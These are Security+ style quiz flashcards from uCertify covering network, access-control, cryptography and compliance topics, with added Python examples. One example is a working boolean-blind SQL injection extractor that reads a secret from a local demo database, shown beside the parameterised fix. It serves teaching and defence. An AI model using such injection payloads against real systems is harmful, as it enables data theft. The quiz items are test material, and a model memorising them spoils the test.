UCERTIFY QUIZZES

WHAT FEATURE PRIMARILY HELPS TO PROTECT AGAINST POISONING ATTACKS? FLOOD GUARD FEATURES SNMPV3 ARP INSPECTION LOOP PROTECTION

ARP INSPECTION (DYNAMIC ARP INSPECTION VALIDATES EACH ARP PACKET ON AN UNTRUSTED PORT AGAINST THE DHCP SNOOPING BINDING TABLE AND DROPS SPOOFED ARP REPLIES)
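Dynamic ARP Inspection in miniature, as an added example that is not part of the uCertify quiz. The switch keeps a DHCP-snooping binding table (IP, MAC, port); every ARP packet on an untrusted port is checked against it and dropped when the sender fields do not match, which is what stops a host from poisoning its neighbours' ARP caches. The binding table, port names and ARP packets are constructed sample data.

```python
"""Dynamic ARP Inspection (DAI) in miniature.

Added example, not part of the uCertify quiz. A switch running DAI checks every
ARP packet arriving on an untrusted port against the DHCP-snooping binding
table (IP, MAC, port) and drops packets whose sender fields do not match. The
binding table, port names and ARP packets below are constructed sample data.
"""
from dataclasses import dataclass

# Constructed DHCP-snooping binding table: (sender IP, sender MAC) -> switch port.
BINDINGS = {
    ("10.0.0.1", "aa:aa:aa:aa:aa:01"): "Gi1/0/1",    # default gateway
    ("10.0.0.10", "aa:aa:aa:aa:aa:10"): "Gi1/0/10",
    ("10.0.0.11", "aa:aa:aa:aa:aa:11"): "Gi1/0/11",
}
# Ports DAI does not inspect (uplinks / the port toward the DHCP server).
TRUSTED_PORTS = {"Gi1/0/1"}


@dataclass(frozen=True)
class ArpPacket:
    port: str        # ingress switch port
    sender_mac: str  # ARP "sender hardware address"
    sender_ip: str   # ARP "sender protocol address"
    target_ip: str
    op: str          # "request" or "reply"


def inspect(pkt: ArpPacket) -> str:
    """Return 'permit' or a 'drop: ...' reason for one ARP packet."""
    if pkt.port in TRUSTED_PORTS:
        return "permit"
    key = (pkt.sender_ip, pkt.sender_mac.lower())
    bound_port = BINDINGS.get(key)
    if bound_port is None:
        return "drop: sender IP/MAC pair has no DHCP-snooping binding"
    if bound_port != pkt.port:
        return "drop: binding exists but on a different port"
    return "permit"


def filter_arp(packets):
    """What the switch would log: one (packet, verdict) pair per packet."""
    return [(p, inspect(p)) for p in packets]


# Constructed traffic: two legitimate packets, then an attacker on Gi1/0/12
# claiming to be the gateway, then the same attacker borrowing 10.0.0.10's
# real MAC/IP pair from a port it is not bound to.
SAMPLE = [
    ArpPacket("Gi1/0/10", "aa:aa:aa:aa:aa:10", "10.0.0.10", "10.0.0.1", "request"),
    ArpPacket("Gi1/0/1", "aa:aa:aa:aa:aa:01", "10.0.0.1", "10.0.0.10", "reply"),
    ArpPacket("Gi1/0/12", "de:ad:be:ef:00:01", "10.0.0.1", "10.0.0.10", "reply"),
    ArpPacket("Gi1/0/12", "aa:aa:aa:aa:aa:10", "10.0.0.10", "10.0.0.11", "reply"),
]


def verdicts(packets=SAMPLE):
    """Verdict strings in packet order."""
    return [v for _, v in filter_arp(packets)]


if __name__ == "__main__":
    for pkt, verdict in filter_arp(SAMPLE):
        print(f"{pkt.port:9} {pkt.sender_ip:10} {pkt.sender_mac}  {verdict}")
```

The trusted port is the escape hatch: anything on it is uninspected, so trusted ports should be only the uplinks and the port facing the DHCP server. Real DAI implementations also rate-limit ARP on untrusted ports and can check that the ARP sender MAC matches the Ethernet source MAC.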

A THIRD-PARTY TEAM IS GOING TO FORMALLY EXAMINE YOUR ORG'S OVERALL SEC PRACTICES TO MAKE SURE THEY MEET REG COMPLIANCE GOALS. YOUR ORG MAY BE FINED IF IT FAILS. WHAT WOULD THIS VERIFICATION PROCESS BE CALLED? (SECURITY FUNDAMENTALS) AUDIT CERTIFICATION EVALUATION ASSESSMENT

AUDIT

WHICH OF THE FOLLOWING IS A SITE W/O HARDWARE SET UP IN ADVANCE? COLD SPARE COLD SITE HOT SPARE HOT SITE

COLD SITE

WHICH OF THE FOLLOWING SHOULD YOU FOLLOW FOR SECURING ACCOUNTS IN ALMOST ANY IDENTITY SYSTEM? WHEN GIVING MULTIPLE ACCOUNTS TO A SINGLE USER ENSURE THAT EACH ACCOUNT HAS THE SAME PASSWORD USE GENERIC ACCOUNTS ASSIGN PERMISSIONS TO INDIVIDUAL ACCOUNTS RATHER THAN GROUPS CHOOSE USER NAMES CAREFULLY ACCORDING TO A STD NAMING CONVENTION

- CHOOSE USER NAMES CAREFULLY ACCORDING TO NAMING CONVENTION - WHERE POSSIBLE, ASSIGN PERMISSIONS TO GROUPS RATHER THAN INDIVIDUAL ACCOUNTS - WHERE POSSIBLE, AVOID THE USE OF GENERIC ACCOUNTS (GUEST ACCOUNTS) - ASSIGN ADMINISTRATORS 2 ACCOUNTS EACH: AN ADMINISTRATOR ACCOUNT FOR TASKS THAT REQUIRE ESCALATED PRIVILEGES, AND A STD USER ACCT FOR EVERYTHING ELSE - WHEN GIVING MULTIPLE ACCOUNTS TO A SINGLE USER, ENSURE THAT EACH ACCOUNT HAS A SEPARATE PASSWORD

YOU'RE HARDENING A WEB APPLICATION. WHICH OF THESE FEATURES SHOULD YOU ENSURE WHILE HARDENING THE UNDERLYING HOST AND NETWORK? - MAKE SURE THAT APP COMPONENTS AND USERS OPERATE IN A MOST-PRIVILEGE ENVIRONMENT - CONDUCT YEARLY SECURITY AUDITS - ENABLE UNNECESSARY APPS, SERVICES, AND USER ACCTS - ENSURE HOST IS KEPT UPDATED - PROTECT NETWORK WITH FIREWALLS, NIDS/NIPS, OR EVEN SPECIFIC WEB APP FIREWALLS

- ENSURE HOST IS KEPT UPDATED - PROTECT THE NETWORK WITH FIREWALLS, NIDS/NIPS, OR EVEN SPECIFIC WEB APP FIREWALLS - DISABLE UNNECESSARY APPS, SERVICES, AND USER ACCOUNTS - APPLY ANTIVIRUS AND HIDS/HIPS SOFTWARE ON THE HOST - IF APP USES MULTIPLE SERVERS

12 MANDATED CONTROLS OF PCI DSS

- INSTALL & MAINTAIN FIREWALL CONFIGURATION TO PROTECT CARDHOLDER DATA - DO NOT USE VENDOR-SUPPLIED DEFAULTS FOR SYSTEM PASSWORDS & OTHER SECURITY PARAMETERS - PROTECT STORED CARDHOLDER DATA - ENCRYPT TRANSMISSION OF CARDHOLDER DATA ACROSS OPEN, PUBLIC NETWORKS - USE AND REG. UPDATE ANTIVIRUS SOFTWARE OR PROGRAMS - DEVELOP AND MAINTAIN SECURE SYSTEMS AND APPLICATIONS - RESTRICT ACCESS TO CARDHOLDER DATA BY BUSINESS NEED TO KNOW - ASSIGN A UNIQUE ID TO EACH PERSON W/COMPUTER ACCESS - RESTRICT PHYSICAL ACCESS TO CARDHOLDER DATA - TRACK AND MONITOR ALL ACCESS TO NETWORK RESOURCES AND CARDHOLDER DATA - REGULARLY TEST SECURITY SYSTEMS AND PROCESSES - MAINTAIN A POLICY THAT ADDRESSES INFO SEC FOR ALL PERSONNEL

HOW MANY HARD DRIVES DOES RAID 10 REQUIRE? - 2 HARD DRIVES FOR THE DISK MIRROR AND 1 MORE DISK TO STRIPE THE MIRRORED DISKS - 4 HARD DRIVES FOR THE DISK MIRROR AND 1 MORE DISK TO STRIPE THE MIRRORED DISKS - 1 HARD DRIVE FOR THE DISK MIRROR AND 2 MORE DISKS TO STRIPE THE MIRRORED DISKS - 2 HARD DRIVES FOR THE DISK MIRROR AND 2 MORE DISKS TO STRIPE THE MIRRORED DISKS

2 HARD DRIVES FOR THE DISK MIRROR AND 2 MORE DISKS TO STRIPE THE MIRRORED DISKS (RAID 10 NEEDS AT LEAST 4 DRIVES: TWO MIRRORED PAIRS, STRIPED TOGETHER)

IN ACTIVE DIRECTORY, WHAT IS THE BEST PLACE TO ASSIGN PERMISSIONS? A UNIVERSAL GROUP AN INDIVIDUAL USER A GLOBAL GROUP A DOMAIN LOCAL GROUP

A DOMAIN LOCAL GROUP (AGDLP: PUT ACCOUNTS IN GLOBAL GROUPS, GLOBAL GROUPS IN DOMAIN LOCAL GROUPS, AND ASSIGN THE PERMISSIONS TO THE DOMAIN LOCAL GROUP)

WHICH OF THE FOLLOWING STATEMENTS IS TRUE REGARDING VIRTUALIZATION? - IT'S DIFFICULT TO CREATE A SNAPSHOT OF A VM - VIRTUAL TEST ENVIRONMENTS ARE AN IDEAL PLACE TO THOROUGHLY TEST SEC CONTROLS AFTER DEPLOYING THEM ON THE "REAL" NETWORK - A TEST VM IS ALSO USEFUL FOR TESTING OS OR APPLICATION PATCHES TO MAKE SURE THEY DON'T INTRODUCE ANY PROBLEMS - IT'S REASONABLY EASY TO MAINTAIN LOW AVAILABILITY FOR SERVICES HOSTED ON A VM

A TEST VM IS ALSO USEFUL FOR TESTING OS OR APPLICATION PATCHES TO MAKE SURE THEY DON'T INTRODUCE ANY PROBLEMS

YOU WANT TO USE YOUR ANDROID PHONE TO STORE AND MANAGE CRYPTOGRAPHIC CERTIFICATES. WHICH TYPE OF SOLUTION WILL YOU CHOOSE TO DO THIS USING SECURE HARDWARE? MDM A WIRELESS TPM SEAndroid A microSD HSM

A microSD HSM (A Hardware Security Module)

WHICH AAA ELEMENT TRACKS THE ACTIONS OF AN AUTHENTICATED USER FOR LATER REVIEW? AUTHORIZATION IDENTIFICATION ACCOUNTING AUTHENTICATION

ACCOUNTING TRACKS ACTIONS OF AN AUTHENTICATED USER FOR LATER REVIEW AUTHENTICATION VERIFIES PRINCIPALS ID AUTHORIZATION SPECIFIES EXACT RESOURCES A GIVEN PRINCIPAL IS ALLOWED TO ACCESS

WHICH OF THE FOLLOWING IS A LIST ATTACHED TO A RESOURCE, GIVING PERMISSIONS OR RULES ABOUT PRECISELY WHO CAN ACCESS IT? QOS 802.1Q DIFFERENTIATED SERVICES ACL

ACL

WHICH OF THE FOLLOWING DELIVERS ADVERTISEMENTS TO THE INFECTED SYSTEM, USUALLY WITHIN A BROWSER OR OTHER APPLICATION WINDOWS? TROJAN ADWARE WORM VIRUS

ADWARE

IF ALICE WISHES TO DIGITALLY SIGN THE MESSAGE THAT SHE IS SENDING TO BOB, WHAT KEY WOULD SHE USE TO CREATE THE DIGITAL SIGNATURE? (CRYPTOGRAPHY) ALICE'S PRIVATE KEY BOB'S PUBLIC KEY BOB'S PRIVATE KEY ALICE'S PUBLIC KEY

ALICE'S PRIVATE KEY

WHICH ONE OF THE FOLLOWING IS NOT A MANDATED CONTROL UNDER PCI DSS? (SECURITY FUNDAMENTALS) DO NOT USE VENDOR-SUPPLIED DEFAULTS FOR SYSTEM PASSWORDS & OTHER SECURITY PARAMETERS ALLOW PHYSICAL ACCESS TO CARDHOLDER DATA ENCRYPT TRANSMISSION OF CARDHOLDER DATA ACROSS OPEN PUBLIC NETWORKS USE & REGULARLY UPDATE ANTIVIRUS SOFTWARE OR PROGRAMS

ALLOW PHYSICAL ACCESS TO CARDHOLDER DATA

WHICH OF THE FOLLOWING CAN YOU USE FOR NETWORK MAPPING AND SERVICE ENUMERATION, THOUGH IT CAN PERFORM OTHER TASKS? (RISK MGMT) ANGRY IP SCANNER AIRCRACK-NG WIFITE KISMET

ANGRY IP SCANNER

WHAT CONNECTION TYPE IS VERY SIMILAR TO BLUETOOTH BUT IS USED BY MORE SPECIALIZED DEVICES? NFC RFID ANT+ GPS

ANT+

WHICH OF THE FOLLOWING ASSESSMENTS WILL USE FOR IDENTIFYING INSIDER THREATS? (RISK MGMT) BEHAVIORAL INSTINCTUAL HABITUAL IOCS

BEHAVIORAL

WHAT KIND OF PENETRATION TEST INVOLVES A TESTER WITH NO KNOWLEDGE OF YOUR NETWORK CONFIGURATION BEFORE THE TEST? (RISK MGMT) BLACK HAT BLACK BOX WHITE HAT WHITE BOX

BLACK BOX

WHICH OF THE FOLLOWING ATTACKS USES STATEMENTS THAT SHOULD CREATE VERIFIABLE CHANGES IN PAGE OUTPUT, OR ELSE PERFORMS TIME-INTENSIVE OPS AND WATCHES FOR SERVER DELAY? STACKED QUERY XSRF BLIND INJECTION SIGNATURE EVASION

BLIND INJECTION
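Boolean-based blind SQL injection worked end to end, as an added example that is not part of the uCertify quiz. The vulnerable lookup answers only "row exists / does not exist"; each probe appends a condition that changes that answer only when a guessed character is right, so the attacker reads another user's secret one character at a time. The parameterised lookup shows the same payload failing. The table contents are constructed sample data.

```python
"""Boolean-based blind SQL injection against a constructed SQLite database.

Added example, not part of the uCertify quiz. `lookup_vulnerable` builds its
query by string formatting (the flaw) and reveals nothing but "row exists /
does not exist". `extract_secret` shows that this single bit is enough to read
another user's secret one character at a time, and `lookup_safe` shows the
same payload failing once the value is bound as a parameter.
"""
import sqlite3
import string


def make_db() -> sqlite3.Connection:
    """Constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cr3t"), ("bob", "hunter2")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> bool:
    """The flaw: user input spliced into SQL. Caller only learns True/False."""
    sql = f"SELECT 1 FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchone() is not None


def lookup_safe(conn: sqlite3.Connection, name: str) -> bool:
    """The fix: the driver binds the value, so quotes are just characters."""
    sql = "SELECT 1 FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchone() is not None


def extract_secret(oracle, known_user: str, target: str, max_len: int = 32) -> str:
    """Recover `target`'s secret using only a True/False oracle.

    Each probe is  known_user' AND substr(<secret>, pos, 1) = 'c'--  : the row
    still matches only when the guessed character is right, so the verifiable
    change in output (row found vs not found) leaks one character per hit.
    """
    alphabet = string.ascii_letters + string.digits
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = (f"{known_user}' AND substr((SELECT secret FROM users "
                       f"WHERE name = '{target}'), {pos}, 1) = '{ch}'--")
            if oracle(payload):
                recovered += ch
                break
        else:
            break  # no character matched: end of the secret (or outside alphabet)
    return recovered


def demo():
    """Returns (what the vulnerable endpoint leaks, what the safe one leaks)."""
    conn = make_db()
    leaked = extract_secret(lambda p: lookup_vulnerable(conn, p), "alice", "bob")
    blocked = extract_secret(lambda p: lookup_safe(conn, p), "alice", "bob")
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print(f"vulnerable endpoint leaked: {leaked!r}")
    print(f"parameterised endpoint leaked: {blocked!r}")
```

The time-based variant in the flashcard replaces the substr condition with a deliberately slow expression that only runs when the guess is right, and times the response instead of reading it; the extraction loop is otherwise identical. The alphabet above covers letters and digits only, so a secret containing other characters would be cut short at the first such character.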

A COMPANY CONFIGURES WORKSTATIONS TO REFUSE TO RUN ANY SOFTWARE ON AN UNAPPROVED LIST. WHAT IS THIS AN EXAMPLE OF? ALLOW LISTING SANDBOXING HARDENING BLOCK LISTING

BLOCK LISTING (DENY LISTS) USES A LIST OF SOFTWARE THAT IS NOT ALLOWED FOR USE (BLACKLISTING)

CAMILLA WANTS TO CREATE AN AGREEMENT DEFINING THE GENERAL RELATIONSHIP BETWEEN BUSINESS PARTNERS THAT DEFINES HOW EACH ORG SHARES PROFITS, LOSSES, PROPERTY, AND LIABILITY. WHAT TYPE OF AGREEMENT SHOULD CAMILLA USE? BPA ISA NDA MOU

BPA (BUSINESS PARTNERSHIP AGREEMENT)

WHICH OF THE FOLLOWING IS AN ON-PATH ATTACK IN WHICH A TROJAN OR OTHER SPYWARE MODIFIES THE WEB PAGES THAT THE USER VIEWS OR THE ACTIONS THAT THE USER TAKES? MODIFIED HOSTS FILE BROWSER-BASED COMPROMISED ROUTER COMPROMISED SERVER

BROWSER-BASED

YOU HAVE INVESTIGATED AN ATTACK WHERE THE ATTACKER HAS ENTERED A VERY LONG STRING INTO AN INPUT FIELD, WHICH WAS FOLLOWED BY A SYSTEM COMMAND. WHAT TYPE OF ATTACK LIKELY TOOK PLACE? XSS BUFFER OVERFLOW XSRF LDAP INJECTION

BUFFER OVERFLOW

SOMEONE STOLE THOUSANDS OF CUSTOMER RECORDS FROM YOUR ORG'S DATABASE. WHAT ASPECT OF SECURITY WAS PRIMARILY ATTACKED? (SECURITY FUNDAMENTALS) INTEGRITY AVAILABILITY PORTABILITY CONFIDENTIALITY

CONFIDENTIALITY

WHICH OF THE FOLLOWING MAKES THE MATHEMATICAL RELATIONSHIP BETWEEN THE PLAINTEXT AND THE KEY AS COMPLEX AS POSSIBLE, SO THAT A PARTIALLY CORRECT KEY IS USELESS TO AN ATTACKER? (CRYPTOGRAPHY) DIFFUSION CONFUSION TRANSPOSITION ONE-TIME PAD

CONFUSION

YOUR ANALYSIS REVEALS THAT A WEB APPLICATION OUTAGE WAS CAUSED BY ONE OF THE COMPANY'S DEVELOPERS UPLOADING A NEWER VERSION OF THE THIRD PARTY LIBRARIES THAT WERE SHARED AMONG SEVERAL APPS. WHICH OF THE FOLLOWING IMPLEMENTATIONS WOULD BE BEST TO PREVENT THE ISSUE FROM REOCCURRING? SECURITY GROUPS INSTANCE AWARENESS CONTAINERIZATION API INSPECTION

CONTAINERIZATION

WHAT AUTHENTICATION STD IS USED BY ACTIVE-DUTY US MILITARY PERSONNEL? OTP PIV CAC SIM

CAC (COMMON ACCESS CARD)

WHICH OF THE FOLLOWING SOLUTIONS WOULD BE BEST IN ALLOWING AN ENTERPRISE TO CENTRALLY APPLY ITS SECURITY POLICIES AND PROVIDE MANAGEABILITY AND VISIBILITY INTO THE PLATFORMS? PRIVATE DEPLOYMENT SECURITY AS A SERVICE CASB OFF-PREMISE POLICIES

CASB

YOU NEED TO INSTALL A NEW FIRE EXTINGUISHER RATED FOR COMBUSTIBLE-METAL FIRES NEXT TO THE SERVER CLOSET. WHAT CLASS WOULD BE MOST USEFUL? CLASS D CLASS A CLASS B CLASS K

CLASS D (COMBUSTIBLE METALS; FIRES IN ENERGIZED ELECTRICAL EQUIPMENT ARE CLASS C)

WHICH POLICY ENSURES THAT ALL THE IMPORTANT DOCUMENTS, CONFIDENTIAL LETTERS, ETC. ARE REMOVED AND LOCKED AWAY WHEN AN EMPLOYEE LEAVES HIS/HER WORKSTATION? SEPARATION OF DUTIES MANDATORY VACATION CLEAN DESK POLICY AUP

CLEAN DESK POLICY

YOU ARE DEVELOPING AN APPLICATION FOR SALE TO THE PUBLIC. YOU WANT TO ASSURE YOUR USERS THAT THE APP THEY RECEIVE ACTUALLY CAME FROM YOU. WHICH WOULD YOU USE? TRUSTED HARDWARE CODE SIGNING FIREWALL HIDS

CODE SIGNING

YOU'RE BRINGING ALL THE CODE CHANGES FROM. MULTIPLE TEAM MEMBERS INTO THE SAME DEVELOPMENT PROJECT THRU AUTOMATION. WHICH OF THE FOLLOWING BEST DESCRIBES THIS PROCESS? - CONTINUOUS DELIVERY - CONTINUOUS DEPLOYMENT - CONTINUOUS INTEGRATION - CONTINUOUS MONITORING

CONTINUOUS INTEGRATION

STEF WANTS TO SELECT A MOBILE DEVICE DEPLOYMENT THAT PROVIDES EMPLOYEES WITH DEVICES THAT ARE COMPANY-ISSUED AND SUPPORTED, BUT EMPLOYEES CAN USE THEM FOR PERSONAL REASONS TOO. WHICH DEPLOYMENT MODEL IS THIS? BYOD CYOD COBO COPE

COPE

YOU ARE ASKED TO ANALYZE THE AGGREGATED EVENTS TO FIND USEFUL DATA THAT MIGHT NEED ADDITIONAL HUMAN REVIEW. WHICH OF THE FOLLOWING SIEM SOFTWARE FEATURES WILL YOU USE? LOG RETENTION AGGREGATION CORRELATION ALERTS

CORRELATION

A security analyst has been asked to investigate a situation after the SOC started to receive alerts from the SIEM. The analyst first looks at the domain controller and finds that an attack took place where the "dictionary" is made up of stolen username & password pairs from another compromised system. Which of the following events has taken place? ZERO DAY MITM CRED STUFFING BIRTHDAY

CRED STUFFING
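The SIEM correlation card and the credential-stuffing card above describe the same situation from two sides, so one added example serves both (this is not part of the uCertify quiz). Aggregation just counts failures; the correlation rule below keys on the shape of credential stuffing, one source trying many different accounts a few times each inside a short window, which is what distinguishes a stuffing run from a brute force against a single account. The log lines and their format are constructed sample data.

```python
"""SIEM-style correlation: spotting credential stuffing in auth logs.

Added example, not part of the uCertify quiz. The log lines are constructed
sample data in the form `<ISO timestamp> auth <ok|fail> user=<name> src=<ip>`.
The rule flags a source that failed against many *different* accounts inside
a short window, and raises severity if the same source then succeeded (one of
the stolen pairs worked).
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

LINE = re.compile(
    r"^(?P<ts>\S+) auth (?P<result>ok|fail) user=(?P<user>\S+) src=(?P<src>\S+)$"
)

# Constructed: 203.0.113.5 sprays six accounts and hits one; 198.51.100.7
# hammers a single account (brute force, a different rule); 192.0.2.20 is a
# user who mistyped once.
SAMPLE_LOG = """\
2024-05-01T09:00:01 auth fail user=amy src=203.0.113.5
2024-05-01T09:00:02 auth fail user=ben src=203.0.113.5
2024-05-01T09:00:02 auth fail user=admin src=198.51.100.7
2024-05-01T09:00:03 auth fail user=cara src=203.0.113.5
2024-05-01T09:00:04 auth fail user=admin src=198.51.100.7
2024-05-01T09:00:04 auth fail user=dev src=203.0.113.5
2024-05-01T09:00:05 auth fail user=admin src=198.51.100.7
2024-05-01T09:00:06 auth fail user=erin src=203.0.113.5
2024-05-01T09:00:07 auth ok user=fay src=203.0.113.5
2024-05-01T09:00:08 auth fail user=admin src=198.51.100.7
2024-05-01T09:01:00 auth fail user=gus src=192.0.2.20
2024-05-01T09:01:05 auth ok user=gus src=192.0.2.20
""".splitlines()


def parse(lines):
    """Yield (timestamp, result, user, src) for lines matching the format."""
    for line in lines:
        m = LINE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["src"]


def correlate(lines, window=timedelta(minutes=5), min_users=5):
    """Return {src: {"users": [...], "hit": bool}} for every source that
    failed against at least `min_users` distinct accounts within `window`.
    `hit` is True when the same source also logged a success."""
    fails = defaultdict(list)   # src -> [(ts, user)]
    successes = set()           # sources with at least one "ok"
    for ts, result, user, src in parse(lines):
        if result == "fail":
            fails[src].append((ts, user))
        else:
            successes.add(src)

    alerts = {}
    for src, events in fails.items():
        events.sort()
        start = 0
        for end in range(len(events)):            # sliding window over failures
            while events[end][0] - events[start][0] > window:
                start += 1
            users = {u for _, u in events[start:end + 1]}
            if len(users) >= min_users:
                alerts[src] = {"users": sorted(users), "hit": src in successes}
                break
    return alerts


if __name__ == "__main__":
    for src, info in correlate(SAMPLE_LOG).items():
        sev = "HIGH (success after spray)" if info["hit"] else "MEDIUM"
        print(f"{src}: {len(info['users'])} accounts tried, severity {sev}")
```

The thresholds (5 accounts in 5 minutes) are assumptions to tune per environment; stuffing tools that rotate source IPs defeat a per-source rule, so production rules usually also correlate on the user-agent string or on the global rate of distinct-account failures.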

ASSUMING THAT ALL 4 ROLES EXIST SEPARATELY AT YOUR COMPANY, WHO OVERSEES STRATEGIC SECURITY NEEDS, WITH A FOCUS ON ORGANIZATIONAL RISK MGMT? (SECURITY FUNDAMENTALS) CPO CIO CCO CSO

CSO - CHIEF SECURITY OFFICER

IN WHICH OF THE FOLLOWING CAN THE EMPLOYEE CHOOSE BETWEEN A LIST OF DEVICES THE COMPANY HAS APPROVED FOR SECURITY FEATURES AND SUPPORT? ASSET TRACKING BYOD GPS CYOD

CYOD (CHOOSE YOUR OWN DEVICE)

WHICH OF THE FOLLOWING INCLUDES EXPLICIT ACES SET ON THE OBJECT, INHERITED ACES RECEIVED FROM ITS PARENTS, AND GENERIC ACES FROM ITS CLASS? DACL IdP KBA SID

DACL - FULL LIST OF ACES THAT APPLY TO AN OBJECT

WHO AMONG THE FOLLOWING IS A SYSTEM ADMINISTRATOR RESPONSIBLE FOR CREATING AND ENFORCING THE TECHNICAL CONTROLS REGARDING ACCESS TO DATA, UNDER THE DIRECTION OF ITS OWNER? DATA STEWARD PRIVACY OWNER DATA CUSTODIAN DATA OWNER

DATA CUSTODIAN

Which of the following is the correct sequence of encryption ciphers from the weakest to the strongest? (CRYPTOGRAPHY) DES - BLOWFISH - AES - 3DES 3DES - DES - AES - BLOWFISH 3DES - DES - BLOWFISH - AES DES - 3DES - BLOWFISH - AES

DES - 3DES - BLOWFISH - AES

WHAT KIND OF INFORMATION IS MOST IMPORTANT FOR AN INCIDENT RESPONSE TEAM? - DETAILED FORENSICS PROCEDURES AND RELATED LEGAL REQUIREMENTS - DETAILED SYSTEM DOCUMENTATION AVAILABLE AT ALL TIMES - AWARENESS OF THE EXTRA PERMISSIONS THEY'VE BEEN GIVEN - HIGH-LEVEL UNDERSTANDING OF ASSETS OF THE ORG

DETAILED FORENSICS PROCEDURES AND RELATED LEGAL REQUIREMENTS

YOU ARE LOOKING FOR A CONTROL THAT WOULD DISCOURAGE THE ATTACKER FROM ATTEMPTING TO GAIN ACCESS. WHAT TYPE OF SECURITY CONTROL WILL YOU IMPLEMENT? PREVENTIVE CORRECTIVE DETERRENT DETECTIVE

DETERRENT

ALICE, A SECURITY ANALYST, PERFORMS A BACKUP THAT CAPTURES THE CHANGES SINCE THE LAST FULL BACKUP. WHAT TYPE OF BACKUP HAS SHE PERFORMED? DIFFERENTIAL BACKUP INCREMENTAL BACKUP NEW FULL BACKUP SNAPSHOT

DIFFERENTIAL BACKUP

WHAT SERVICE GETS ENABLED WHEN YOU IMPLEMENT LDAP FOR YOUR ORG? DIRECTORY SERVICE BIOMETRIC ID PROVIDER ATTESTATION FEDERATION

DIRECTORY SERVICE

WHICH OF THE FOLLOWING MIGHT PROTECT USERS FROM COPYING SENSITIVE FILES TO EXTERNAL MEDIA? FDE TPM HSM DLP

DLP (DATA LOSS PREVENTION) - PROTECTS ALL SENSITIVE DATA THAT PASSES THRU ENDPOINT ITS INSTALLED ON

YOU'VE JUST DISCOVERED A KIND OF MALWARE THAT OVERWRITES THE HOSTS FILE TO REDIRECT WEB SEARCHES TO A MALICIOUS SITE. WHAT TECHNIQUE DOES IT MOST LIKELY USE? ARP POISONING VLAN HOPPING DOMAIN HIJACKING DNS POISONING

DNS POISONING

WHAT TYPE OF XSS ATTACK WOULD NOT BE VISIBLE TO A SECURITY ANALYST INSPECTING THE HTML SOURCE CODE IN A BROWSER? DOM-BASED PERSISTENT PARAMETER POLLUTION XSRF

DOM-BASED (DOCUMENT OBJECT MODEL)

WHICH OF THE FOLLOWING STATEMENTS IS CORRECT REGARDING DOWNGRADES? DOWNGRADES DONT REQUIRE FULL INSTALLATION DOWNGRADES MUST BE COMPLETED ALL AT ONCE DOWNGRADES REQUIRE MORE COMPLEX PROCEDURES THAN UPGRADES DOWNGRADES ARE GENERALLY LESS SUPPORTED THAN UPGRADES

DOWNGRADES ARE GENERALLY LESS SUPPORTED THAN UPGRADES

WHICH DOCUMENT IS A TECHNICAL PROCEDURE FOR RESTORING SERVICES AND OPERATIONS AFTER SIGNIFICANT DISRUPTIONS? DRP COOP BIA BCP

DRP (DISASTER RECOVERY PLAN)

Which of the following is a NIST standard based on the discrete logarithm problem and used for digital signatures rather than encryption? (CRYPTOGRAPHY) DSA ECC HMAC DH

DSA (Digital Signature Algorithm) - specified in FIPS 186; it signs and verifies only and does not encrypt. Signing is fast, but verification is slower than RSA's.

A NEW PRIVACY LAW DEMANDS MORE ROBUST PROTECTION FOR YOUR CUSTOMER DATABASE. FIRST, YOU RESEARCHED DATABASE SECURITY PRODUCTS TO FIND WHICH WOULD RELIABLY MEET YOUR NEEDS. NOW THAT YOU'VE SELECTED AND INSTALLED ONE, YOU'RE CURRENTLY TRAINING ADMINISTRATORS TO PERFORM INTEGRITY CHECKS, UPDATE THE SOFTWARE, AND REVIEW LOGS FOR SUSPICIOUS ACTIVITIES. WHAT ARE YOU PRACTICING? (SECURITY FUNDAMENTALS) REGULATORY COMPLIANCE DUE CARE AVAILABILITY NEGLIGENCE

DUE CARE

WHICH OF THE FOLLOWING IS THE TECHNIQUE USED TO LOOK FOR INFORMATION IN THE TRASH OR AROUND A DUSTBIN? BAITING PIGGYBACKING DUMPSTER DIVING PRETEXTING

Dumpster diving

WHICH OF THE FOLLOWING IS A PROCESS WHERE YOU IDENTIFY, SECURE, AND ANALYZE DATA WITH THE INTENT OF USING IT IN A CRIMINAL OR CIVIL COURT CASE? INDUSTRIAL CAMOUFLAGE SIGNAL SURVEYS EDISCOVERY DUAL CONTROL VIOLATION

EDISCOVERY

WHICH OF THE FOLLOWING IS AN EXTENSION OF THE DIFFIE-HELLMAN KEY EXCHANGE INTO A COMPLETE DISCRETE LOGARITHM CRYPTOSYSTEM, ALLOWING FOR TASKS LIKE GENERAL ENCRYPTION? (CRYPTOGRAPHY) RSA MD5 ElGamal RIPEMD

ElGamal

WHICH OF THE FOLLOWING STATEMENTS IS CORRECT REGARDING TACACS+ OVER RADIUS? - ENCRYPTS ENTIRE ACCESS REQUEST PACKETS - BETTER ABLE TO SUPPORT IP PACKETS - LESS COMPLICATED TO ADMINISTER - USES TCP PORT 149

ENCRYPTS ENTIRE ACCESS REQUEST PACKETS (TACACS+ ENCRYPTS THE WHOLE PACKET BODY AND RUNS OVER TCP PORT 49; RADIUS RUNS OVER UDP AND OBSCURES ONLY THE PASSWORD FIELD)

WHICH OF THE FOLLOWING ENCRYPTS THE PACKET PAYLOAD, ALONG WITH INTEGRITY AND AUTHENTICATION INFORMATION? AH CLIENTLESS VPN ESP IKE

ESP (ENCAPSULATING SECURITY PAYLOAD)

WHICH OF THE FOLLOWING IS A ROGUE AP THAT HAS THE SAME SSID AND SECURITY SETTINGS AS A LEGIT AP, SO THAT USERS MIGHT CONNECT TO IT INSTEAD OF THE REAL ONE? JAMMING EVIL TWIN NFC VULNERABILITIES BLUEJACKING

EVIL TWIN

WHAT KIND OF PROXY WOULD YOU USE TO MEDIATE COMMUNICATIONS BETWEEN LAN CLIENTS AND INTERNET SERVERS BUT REQUIRE CLIENT-SIDE CONFIGURATION? REVERSE FORWARD ANONYMOUS TRANSPARENT

FORWARD

